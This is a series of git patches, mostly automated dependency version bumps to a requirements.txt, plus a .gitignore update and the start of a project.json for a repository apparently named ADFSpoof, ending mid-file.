cee6fbfdde3f582eaba8a270b7575f60777301a1 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 26 May 2025 09:34:42 +0000 Subject: [PATCH 076/106] Bump cryptography from 45.0.2 to 45.0.3 Bumps [cryptography](https://github.com/pyca/cryptography) from 45.0.2 to 45.0.3. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/45.0.2...45.0.3) --- updated-dependencies: - dependency-name: cryptography dependency-version: 45.0.3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 857aebe..e041776 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2025.4.26 cffi==1.17.1 -cryptography==45.0.2 +cryptography==45.0.3 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From 179024aca2c0e8bfedd14ad70a97237dd3fa71d9 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 2 Jun 2025 09:50:41 +0000 Subject: [PATCH 077/106] Bump signxml from 4.0.3 to 4.0.4 Bumps [signxml](https://github.com/XML-Security/signxml) from 4.0.3 to 4.0.4. - [Release notes](https://github.com/XML-Security/signxml/releases) - [Changelog](https://github.com/XML-Security/signxml/blob/main/Changes.rst) - [Commits](https://github.com/XML-Security/signxml/compare/v4.0.3...v4.0.4) --- updated-dependencies: - dependency-name: signxml dependency-version: 4.0.4 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index e041776..99a3292 100644 --- a/requirements.txt +++ b/requirements.txt @@ -9,5 +9,5 @@ lxml==5.4.0 pyasn1==0.6.1 pyOpenSSL==25.1.0 pycparser==2.22 -signxml==4.0.3 +signxml==4.0.4 six==1.17.0 From d4ddbccbf0e38cf107eed0dd99e6bb79c4683bab Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 3 Jun 2025 08:46:40 +0000 Subject: [PATCH 078/106] Bump signxml from 4.0.4 to 4.0.5 Bumps [signxml](https://github.com/XML-Security/signxml) from 4.0.4 to 4.0.5. - [Release notes](https://github.com/XML-Security/signxml/releases) - [Changelog](https://github.com/XML-Security/signxml/blob/main/Changes.rst) - [Commits](https://github.com/XML-Security/signxml/compare/v4.0.4...v4.0.5) --- updated-dependencies: - dependency-name: signxml dependency-version: 4.0.5 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 99a3292..73dc127 100644 --- a/requirements.txt +++ b/requirements.txt @@ -9,5 +9,5 @@ lxml==5.4.0 pyasn1==0.6.1 pyOpenSSL==25.1.0 pycparser==2.22 -signxml==4.0.4 +signxml==4.0.5 six==1.17.0 From 5bc7a1df3bf51bcb4f07db40169fbd41802392e1 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 10 Jun 2025 08:27:56 +0000 Subject: [PATCH 079/106] Bump cryptography from 45.0.3 to 45.0.4 Bumps [cryptography](https://github.com/pyca/cryptography) from 45.0.3 to 45.0.4. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/45.0.3...45.0.4) --- updated-dependencies: - dependency-name: cryptography dependency-version: 45.0.4 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 73dc127..f833ef9 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2025.4.26 cffi==1.17.1 -cryptography==45.0.3 +cryptography==45.0.4 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From 91b5919d1ad5e127d12f983b50fe3ad251cd0faf Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Jun 2025 08:43:37 +0000 Subject: [PATCH 080/106] Bump certifi from 2025.4.26 to 2025.6.15 Bumps [certifi](https://github.com/certifi/python-certifi) from 2025.4.26 to 2025.6.15. - [Commits](https://github.com/certifi/python-certifi/compare/2025.04.26...2025.06.15) --- updated-dependencies: - dependency-name: certifi dependency-version: 2025.6.15 dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index f833ef9..f96a499 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ asn1crypto==1.5.1 -certifi==2025.4.26 +certifi==2025.6.15 cffi==1.17.1 cryptography==45.0.4 defusedxml==0.7.1 From 46fb76b47672a46a297832ec03dd09aa86427c8e Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 27 Jun 2025 08:46:10 +0000 Subject: [PATCH 081/106] Bump lxml from 5.4.0 to 6.0.0 Bumps [lxml](https://github.com/lxml/lxml) from 5.4.0 to 6.0.0. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-5.4.0...lxml-6.0.0) --- updated-dependencies: - dependency-name: lxml dependency-version: 6.0.0 dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index f96a499..11e01dd 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==45.0.4 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 -lxml==5.4.0 +lxml==6.0.0 pyasn1==0.6.1 pyOpenSSL==25.1.0 pycparser==2.22 From 2a6f0b71f966ea4d21a6539c58b71c0c8708d91a Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 30 Jun 2025 11:09:05 +0000 Subject: [PATCH 082/106] Bump signxml from 4.0.5 to 4.1.0 Bumps [signxml](https://github.com/XML-Security/signxml) from 4.0.5 to 4.1.0. - [Release notes](https://github.com/XML-Security/signxml/releases) - [Changelog](https://github.com/XML-Security/signxml/blob/main/Changes.rst) - [Commits](https://github.com/XML-Security/signxml/compare/v4.0.5...v4.1.0) --- updated-dependencies: - dependency-name: signxml dependency-version: 4.1.0 dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 11e01dd..5d3f888 100644 --- a/requirements.txt +++ b/requirements.txt @@ -9,5 +9,5 @@ lxml==6.0.0 pyasn1==0.6.1 pyOpenSSL==25.1.0 pycparser==2.22 -signxml==4.0.5 +signxml==4.1.0 six==1.17.0 From 51f6fcb810e62a97b4930083a6299ac76d2e0d71 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 4 Aug 2025 12:35:41 +0000 Subject: [PATCH 083/106] Bump certifi from 2025.6.15 to 2025.8.3 Bumps [certifi](https://github.com/certifi/python-certifi) from 2025.6.15 to 2025.8.3. - [Commits](https://github.com/certifi/python-certifi/compare/2025.06.15...2025.08.03) --- updated-dependencies: - dependency-name: certifi dependency-version: 2025.8.3 dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 5d3f888..58af53a 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ asn1crypto==1.5.1 -certifi==2025.6.15 +certifi==2025.8.3 cffi==1.17.1 cryptography==45.0.4 defusedxml==0.7.1 From e62eb155a78f91267798d885bc9f11375ad9092a Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 6 Aug 2025 08:20:20 +0000 Subject: [PATCH 084/106] Bump cryptography from 45.0.4 to 45.0.6 Bumps [cryptography](https://github.com/pyca/cryptography) from 45.0.4 to 45.0.6. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/45.0.4...45.0.6) --- updated-dependencies: - dependency-name: cryptography dependency-version: 45.0.6 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 5d3f888..b34c1f7 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2025.6.15 cffi==1.17.1 -cryptography==45.0.4 +cryptography==45.0.6 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From e7b3f8221fdc83c8c29aa22ef5ec99e0f3ca87cb Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 20 Aug 2025 10:05:44 +0000 Subject: [PATCH 085/106] Bump signxml from 4.1.0 to 4.2.0 Bumps [signxml](https://github.com/XML-Security/signxml) from 4.1.0 to 4.2.0. - [Release notes](https://github.com/XML-Security/signxml/releases) - [Changelog](https://github.com/XML-Security/signxml/blob/main/Changes.rst) - [Commits](https://github.com/XML-Security/signxml/compare/v4.1.0...v4.2.0) --- updated-dependencies: - dependency-name: signxml dependency-version: 4.2.0 dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 5d3f888..c507f4d 100644 --- a/requirements.txt +++ b/requirements.txt @@ -9,5 +9,5 @@ lxml==6.0.0 pyasn1==0.6.1 pyOpenSSL==25.1.0 pycparser==2.22 -signxml==4.1.0 +signxml==4.2.0 six==1.17.0 From 0c680086c7a14433118163e5b4ecfa911971323c Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 25 Aug 2025 14:33:48 +0000 Subject: [PATCH 086/106] Bump lxml from 6.0.0 to 6.0.1 Bumps [lxml](https://github.com/lxml/lxml) from 6.0.0 to 6.0.1. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-6.0.0...lxml-6.0.1) --- updated-dependencies: - dependency-name: lxml dependency-version: 6.0.1 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 5d3f888..f8c5ded 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==45.0.4 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 -lxml==6.0.0 +lxml==6.0.1 pyasn1==0.6.1 pyOpenSSL==25.1.0 pycparser==2.22 From 5a47248a652693515b7d367a3be9612b02adac59 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 1 Sep 2025 16:45:20 +0000 Subject: [PATCH 087/106] Bump cryptography from 45.0.6 to 45.0.7 Bumps [cryptography](https://github.com/pyca/cryptography) from 45.0.6 to 45.0.7. - [Changelog](https://github.com/pyca/cryptography/blob/45.0.7/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/45.0.6...45.0.7) --- updated-dependencies: - dependency-name: cryptography dependency-version: 45.0.7 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 787898c..5f81297 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2025.8.3 cffi==1.17.1 -cryptography==45.0.6 +cryptography==45.0.7 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From 9ccb2463d0d2c4517d9f71ea45d4b32ef4a944d7 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 17 Sep 2025 08:10:09 +0000 Subject: [PATCH 088/106] Bump pyopenssl from 25.1.0 to 25.3.0 Bumps [pyopenssl](https://github.com/pyca/pyopenssl) from 25.1.0 to 25.3.0. - [Changelog](https://github.com/pyca/pyopenssl/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/pyopenssl/compare/25.1.0...25.3.0) --- updated-dependencies: - dependency-name: pyopenssl dependency-version: 25.3.0 dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 5f81297..74a3911 100644 --- a/requirements.txt +++ b/requirements.txt @@ -7,7 +7,7 @@ eight==1.0.1 future==1.0.0 lxml==6.0.1 pyasn1==0.6.1 -pyOpenSSL==25.1.0 +pyOpenSSL==25.3.0 pycparser==2.22 signxml==4.2.0 six==1.17.0 From 310657289127857c1474c4b3e8715e9e36d4739f Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 22 Sep 2025 08:21:50 +0000 Subject: [PATCH 089/106] Bump lxml from 6.0.1 to 6.0.2 Bumps [lxml](https://github.com/lxml/lxml) from 6.0.1 to 6.0.2. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-6.0.1...lxml-6.0.2) --- updated-dependencies: - dependency-name: lxml dependency-version: 6.0.2 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 5f81297..0f5f75a 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==45.0.7 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 -lxml==6.0.1 +lxml==6.0.2 pyasn1==0.6.1 pyOpenSSL==25.1.0 pycparser==2.22 From 6704dc388e7f1caaf75e545163974ce44910f262 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 16 Oct 2025 08:07:53 +0000 Subject: [PATCH 090/106] Bump cryptography from 45.0.7 to 46.0.3 Bumps [cryptography](https://github.com/pyca/cryptography) from 45.0.7 to 46.0.3. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/45.0.7...46.0.3) --- updated-dependencies: - dependency-name: cryptography dependency-version: 46.0.3 dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 5f81297..73641ee 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2025.8.3 cffi==1.17.1 -cryptography==45.0.7 +cryptography==46.0.3 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From 900d18e45bd9d500cec28a1079358d68103a3047 Mon Sep 17 00:00:00 2001 From: akax <32862241+joseguzman1337@users.noreply.github.com> Date: Tue, 6 Jan 2026 07:36:30 +0800 Subject: [PATCH 091/106] Add macOS system files to .gitignore MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Add .DS_Store pattern to ignore macOS folder metadata - Add ._* pattern to ignore AppleDouble files 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude Sonnet 4.5 --- .gitignore | 22 +++------------------- 1 file changed, 3 insertions(+), 19 deletions(-) diff --git a/.gitignore b/.gitignore index 3b38700..b01404e 100644 --- a/.gitignore +++ b/.gitignore @@ -5,7 +5,6 @@ __pycache__/ # C extensions *.so - # Distribution / packaging .Python build/ @@ -25,17 +24,14 @@ wheels/ .installed.cfg *.egg MANIFEST - # PyInstaller # Usually these files are written by a python script from a template # before PyInstaller builds the exe, so as to inject date/other infos into it. *.manifest *.spec - # Installer logs pip-log.txt pip-delete-this-directory.txt - # Unit test / coverage reports htmlcov/ .tox/ @@ -47,41 +43,30 @@ coverage.xml *.cover .hypothesis/ .pytest_cache/ - # Translations *.mo *.pot - # Django stuff: *.log local_settings.py db.sqlite3 - # Flask stuff: instance/ .webassets-cache - # Scrapy stuff: .scrapy - # Sphinx documentation docs/_build/ - # PyBuilder target/ - # Jupyter Notebook .ipynb_checkpoints - # pyenv .python-version - # celery beat schedule file celerybeat-schedule - # SageMath parsed files *.sage.py - # Environments .env .venv @@ -90,16 +75,15 @@ venv/ ENV/ env.bak/ venv.bak/ - # Spyder project settings .spyderproject .spyproject - # Rope project settings .ropeproject - # mkdocs documentation /site - # mypy .mypy_cache/ +# macOS system files +.DS_Store +._* From e3611ea498870fc7391e44bd6af636b73c2deeec Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 6 Jan 2026 08:13:31 +0000 Subject: [PATCH 092/106] Bump certifi from 2025.8.3 to 2026.1.4 Bumps [certifi](https://github.com/certifi/python-certifi) from 2025.8.3 to 2026.1.4. - [Commits](https://github.com/certifi/python-certifi/compare/2025.08.03...2026.01.04) --- updated-dependencies: - dependency-name: certifi dependency-version: 2026.1.4 dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index f732724..bbc67db 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ asn1crypto==1.5.1 -certifi==2025.8.3 +certifi==2026.1.4 cffi==1.17.1 cryptography==46.0.3 defusedxml==0.7.1 From 60d48e87f49c5e53afa88666368e22fcf648a2a7 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 16 Jan 2026 19:20:24 +0000 Subject: [PATCH 093/106] Bump pyasn1 from 0.6.1 to 0.6.2 in the pip group across 1 directory Bumps the pip group with 1 update in the / directory: [pyasn1](https://github.com/pyasn1/pyasn1). Updates `pyasn1` from 0.6.1 to 0.6.2 - [Release notes](https://github.com/pyasn1/pyasn1/releases) - [Changelog](https://github.com/pyasn1/pyasn1/blob/main/CHANGES.rst) - [Commits](https://github.com/pyasn1/pyasn1/compare/v0.6.1...v0.6.2) --- updated-dependencies: - dependency-name: pyasn1 dependency-version: 0.6.2 dependency-type: direct:production dependency-group: pip ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index bbc67db..3f9a47c 100644 --- a/requirements.txt +++ b/requirements.txt @@ -6,7 +6,7 @@ defusedxml==0.7.1 eight==1.0.1 future==1.0.0 lxml==6.0.2 -pyasn1==0.6.1 +pyasn1==0.6.2 pyOpenSSL==25.3.0 pycparser==2.22 signxml==4.2.0 From da40b66558b18d07fb73890450e8a1bc99b07aa7 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 19 Jan 2026 09:01:20 +0000 Subject: [PATCH 094/106] Bump signxml from 4.2.0 to 4.2.1 Bumps [signxml](https://github.com/XML-Security/signxml) from 4.2.0 to 4.2.1. - [Release notes](https://github.com/XML-Security/signxml/releases) - [Changelog](https://github.com/XML-Security/signxml/blob/main/Changes.rst) - [Commits](https://github.com/XML-Security/signxml/compare/v4.2.0...v4.2.1) --- updated-dependencies: - dependency-name: signxml dependency-version: 4.2.1 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index bbc67db..86c134e 100644 --- a/requirements.txt +++ b/requirements.txt @@ -9,5 +9,5 @@ lxml==6.0.2 pyasn1==0.6.1 pyOpenSSL==25.3.0 pycparser==2.22 -signxml==4.2.0 +signxml==4.2.1 six==1.17.0 From a75f08636c085c91064812bd95ad63c0863f71a9 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 22 Jan 2026 08:17:13 +0000 Subject: [PATCH 095/106] Bump pycparser from 2.22 to 3.0 Bumps [pycparser](https://github.com/eliben/pycparser) from 2.22 to 3.0. - [Release notes](https://github.com/eliben/pycparser/releases) - [Commits](https://github.com/eliben/pycparser/compare/release_v2.22...release_v3.00) --- updated-dependencies: - dependency-name: pycparser dependency-version: '3.0' dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 86c134e..2dfd3df 100644 --- a/requirements.txt +++ b/requirements.txt @@ -8,6 +8,6 @@ future==1.0.0 lxml==6.0.2 pyasn1==0.6.1 pyOpenSSL==25.3.0 -pycparser==2.22 +pycparser==3.0 signxml==4.2.1 six==1.17.0 From e20c98f045b93d151b16bb03885b417baf1cb9d3 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 28 Jan 2026 08:17:25 +0000 Subject: [PATCH 096/106] Bump cryptography from 46.0.3 to 46.0.4 Bumps [cryptography](https://github.com/pyca/cryptography) from 46.0.3 to 46.0.4. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/46.0.3...46.0.4) --- updated-dependencies: - dependency-name: cryptography dependency-version: 46.0.4 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 86c134e..84653c1 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2026.1.4 cffi==1.17.1 -cryptography==46.0.3 +cryptography==46.0.4 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From 3d9b159b37c4c856b3edbf3c5171aafa44f6d58d Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 08:15:19 +0000 Subject: [PATCH 097/106] Bump cryptography from 46.0.4 to 46.0.5 Bumps [cryptography](https://github.com/pyca/cryptography) from 46.0.4 to 46.0.5. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/46.0.4...46.0.5) --- updated-dependencies: - dependency-name: cryptography dependency-version: 46.0.5 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index e4cbb20..e530cae 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2026.1.4 cffi==1.17.1 -cryptography==46.0.4 +cryptography==46.0.5 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From a34a4dbefb07de4ac0a127f8c79ec3d6646d3edd Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 25 Feb 2026 08:17:12 +0000 Subject: [PATCH 098/106] Bump certifi from 2026.1.4 to 2026.2.25 Bumps [certifi](https://github.com/certifi/python-certifi) from 2026.1.4 to 2026.2.25. - [Commits](https://github.com/certifi/python-certifi/compare/2026.01.04...2026.02.25) --- updated-dependencies: - dependency-name: certifi dependency-version: 2026.2.25 dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index e4cbb20..0faabb7 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ asn1crypto==1.5.1 -certifi==2026.1.4 +certifi==2026.2.25 cffi==1.17.1 cryptography==46.0.4 defusedxml==0.7.1 From c1c896a612209ad5b30d966e3478a19fb198d187 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 13 Mar 2026 08:15:22 +0000 Subject: [PATCH 099/106] Bump signxml from 4.2.1 to 4.4.0 Bumps [signxml](https://github.com/XML-Security/signxml) from 4.2.1 to 4.4.0. - [Release notes](https://github.com/XML-Security/signxml/releases) - [Changelog](https://github.com/XML-Security/signxml/blob/main/Changes.rst) - [Commits](https://github.com/XML-Security/signxml/compare/v4.2.1...v4.4.0) --- updated-dependencies: - dependency-name: signxml dependency-version: 4.4.0 dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index b052af2..bbd7ad1 100644 --- a/requirements.txt +++ b/requirements.txt @@ -9,5 +9,5 @@ lxml==6.0.2 pyasn1==0.6.2 pyOpenSSL==25.3.0 pycparser==3.0 -signxml==4.2.1 +signxml==4.4.0 six==1.17.0 From 56d1fdf71a0d71e834dcded0a1e2a77d33a6f561 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 17 Mar 2026 20:40:36 +0000 Subject: [PATCH 100/106] Bump the pip group across 1 directory with 2 updates Bumps the pip group with 2 updates in the / directory: [pyasn1](https://github.com/pyasn1/pyasn1) and [pyopenssl](https://github.com/pyca/pyopenssl). Updates `pyasn1` from 0.6.2 to 0.6.3 - [Release notes](https://github.com/pyasn1/pyasn1/releases) - [Changelog](https://github.com/pyasn1/pyasn1/blob/main/CHANGES.rst) - [Commits](https://github.com/pyasn1/pyasn1/compare/v0.6.2...v0.6.3) Updates `pyopenssl` from 25.3.0 to 26.0.0 - [Changelog](https://github.com/pyca/pyopenssl/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/pyopenssl/compare/25.3.0...26.0.0) --- updated-dependencies: - dependency-name: pyasn1 dependency-version: 0.6.3 dependency-type: direct:production dependency-group: pip - dependency-name: pyopenssl dependency-version: 26.0.0 dependency-type: direct:production dependency-group: pip ... Signed-off-by: dependabot[bot] --- requirements.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/requirements.txt b/requirements.txt index b052af2..1fe3cf1 100644 --- a/requirements.txt +++ b/requirements.txt @@ -6,8 +6,8 @@ defusedxml==0.7.1 eight==1.0.1 future==1.0.0 lxml==6.0.2 -pyasn1==0.6.2 -pyOpenSSL==25.3.0 +pyasn1==0.6.3 +pyOpenSSL==26.0.0 pycparser==3.0 signxml==4.2.1 six==1.17.0 From 3481d90bb9a041758ba0a78852cb559937134ed1 Mon Sep 17 00:00:00 2001 From: joseguzman1337 Date: Wed, 18 Mar 2026 20:00:31 -0500 Subject: [PATCH 101/106] chore: bump all repository dependencies to latest --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a141003..50039b0 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,6 +1,6 @@ asn1crypto==1.5.1 certifi==2026.2.25 -cffi==1.17.1 +cffi==2.0.0 cryptography==46.0.5 defusedxml==0.7.1 eight==1.0.1 From f4c4f7622a9f71a53ed204467998e29f3530dafb Mon Sep 17 00:00:00 2001 From: joseguzman1337 Date: Wed, 25 Mar 2026 14:11:11 -0500 Subject: [PATCH 102/106] chore: refresh Python dependencies --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 50039b0..566b4b2 100644 --- a/requirements.txt +++ b/requirements.txt @@ -4,7 +4,7 @@ cffi==2.0.0 cryptography==46.0.5 defusedxml==0.7.1 eight==1.0.1 -future==1.0.0 +future==0.18.3 lxml==6.0.2 pyasn1==0.6.3 pyOpenSSL==26.0.0 From 4e16656d8679a75bec0c256701c795d603ef3250 Mon Sep 17 00:00:00 2001 From: joseguzman1337 Date: Tue, 31 Mar 2026 07:37:03 -0500 Subject: [PATCH 103/106] [CRUSH] chore(repo): checkpoint pending changes #TASK-000 --- project.json | 47 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 project.json diff --git a/project.json b/project.json new file mode 100644 index 0000000..8131238 --- /dev/null +++ b/project.json @@ -0,0 +1,47 @@ +{ + "name": "repo-repos-adfspoof", + "root": "repos/ADFSpoof", + "projectType": "library", + "targets": { 